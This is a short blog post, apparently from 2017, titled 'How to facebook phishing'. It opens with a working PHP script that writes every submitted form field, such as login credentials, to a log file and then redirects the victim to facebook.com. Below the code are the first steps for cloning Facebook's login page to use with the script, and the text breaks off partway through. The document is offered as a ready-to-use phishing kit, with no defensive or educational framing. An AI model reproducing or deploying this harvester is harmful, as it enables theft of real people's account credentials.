<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Just copy...
Saturday, June 17, 2017
How to facebook phishing

REQUIREMENT:-
1.index.html
2.mail.php
3.log.txt
Process:-
1.open facebook.com then copy the url or link
2.copy url and add it to "IDM" Internet download manager or u can simply save the url file.
3. now open the following downloaded file with notepad:-
4.press ctrl+f...